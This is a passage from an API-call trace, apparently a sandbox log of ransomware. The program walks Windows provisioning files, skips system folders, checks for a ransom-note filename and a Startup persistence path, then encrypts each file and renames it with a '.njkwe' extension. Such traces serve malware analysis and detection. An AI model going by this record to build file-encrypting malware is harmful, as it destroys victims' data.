pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 201 [0081.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\499__connections_cellular_t-mobile usa_ walmart (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\499__connections_cellular_t-mobile usa_ walmart (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.459] GetProcessHeap () returned 0xbe0000 [0081.459] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.459] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="49__CE~1.PRO")) returned 1 [0081.459] lstrcmpiW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.459] lstrcmpiW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.459] lstrcmpiW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.459] lstrcmpiW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.459] lstrcmpiW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.459] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 146 [0081.459] StrStrIW (lpFirst="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.459] lstrcmpW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.459] lstrcmpW (lpString1="49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.459] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.459] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\49__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.460] GetTickCount () returned 0x1154ad1 [0081.460] GetTickCount () returned 0x1154ad1 [0081.460] GetTickCount () returned 0x1154ad1 [0081.460] GetTickCount () returned 0x1154ad1 [0081.460] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.460] GetProcessHeap () returned 0xbe0000 [0081.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.460] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0081.461] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.461] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0081.461] GetProcessHeap () returned 0xbe0000 [0081.461] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.461] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.461] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.465] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.465] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.465] CloseHandle (hObject=0x43c) returned 1 [0081.465] GetProcessHeap () returned 0xbe0000 [0081.465] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.465] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 166 [0081.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\49__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\49__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\49__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.466] GetProcessHeap () returned 0xbe0000 [0081.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.466] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900f0949, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x900f0949, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x900f0949, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", cAlternateFileName="4__CON~1.PRO")) returned 1 [0081.466] lstrcmpiW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.466] lstrcmpiW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.466] lstrcmpiW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.466] lstrcmpiW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.466] lstrcmpiW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.466] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml") returned 159 [0081.466] StrStrIW (lpFirst="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.466] lstrcmpW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.466] lstrcmpW (lpString1="4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.466] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connection", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\4__connections_cellular_claro (argentina)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.467] GetTickCount () returned 0x1154ad1 [0081.467] GetTickCount () returned 0x1154ad1 [0081.467] GetTickCount () returned 0x1154ad1 [0081.467] GetTickCount () returned 0x1154ad1 [0081.467] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.467] GetProcessHeap () returned 0xbe0000 [0081.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.467] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.477] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0081.477] GetProcessHeap () returned 0xbe0000 [0081.477] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.477] CloseHandle (hObject=0x43c) returned 1 [0081.478] GetProcessHeap () returned 0xbe0000 [0081.478] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.478] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\4__connections_cellular_claro (argentina)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\4__Connections_Cellular_Claro (Argentina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\4__connections_cellular_claro (argentina)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.479] GetProcessHeap () returned 0xbe0000 [0081.479] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.479] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911edd2d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911edd2d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911edd2d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="500__C~1.PRO")) returned 1 [0081.479] lstrcmpiW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.479] lstrcmpiW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.479] lstrcmpiW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.479] lstrcmpiW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.479] lstrcmpiW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.479] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml") returned 187 [0081.479] StrStrIW (lpFirst="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.479] lstrcmpW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.480] lstrcmpW (lpString1="500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.480] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.480] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\500__connections_cellular_t-mobile usa_ roam mobility (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.480] GetTickCount () returned 0x1154ae0 [0081.480] GetTickCount () returned 0x1154ae0 [0081.480] GetTickCount () returned 0x1154ae0 [0081.480] GetTickCount () returned 0x1154ae0 [0081.480] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.480] GetProcessHeap () returned 0xbe0000 [0081.480] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.480] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.482] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.482] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0081.482] GetProcessHeap () returned 0xbe0000 [0081.482] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.482] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.482] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.482] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.482] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.483] CloseHandle (hObject=0x43c) returned 1 [0081.483] GetProcessHeap () returned 0xbe0000 [0081.483] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.483] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 207 [0081.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\500__connections_cellular_t-mobile usa_ roam mobility (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\500__Connections_Cellular_T-Mobile USA_ Roam Mobility (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\500__connections_cellular_t-mobile usa_ roam mobility (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.483] GetProcessHeap () returned 0xbe0000 [0081.483] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.483] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911edd2d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911edd2d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911edd2d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="501__C~1.PRO")) returned 1 [0081.483] lstrcmpiW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.483] lstrcmpiW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.483] lstrcmpiW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.483] lstrcmpiW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.483] lstrcmpiW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.484] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml") returned 182 [0081.484] StrStrIW (lpFirst="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.484] lstrcmpW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.484] lstrcmpW (lpString1="501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.484] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\501__Connections_Cellular_T-Mobile USA_ Tracfone (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\501__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.484] GetTickCount () returned 0x1154ae0 [0081.484] GetTickCount () returned 0x1154ae0 [0081.484] GetTickCount () returned 0x1154ae0 [0081.484] GetTickCount () returned 0x1154ae0 [0081.484] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.484] GetProcessHeap () returned 0xbe0000 [0081.484] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.484] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0081.486] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.486] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: 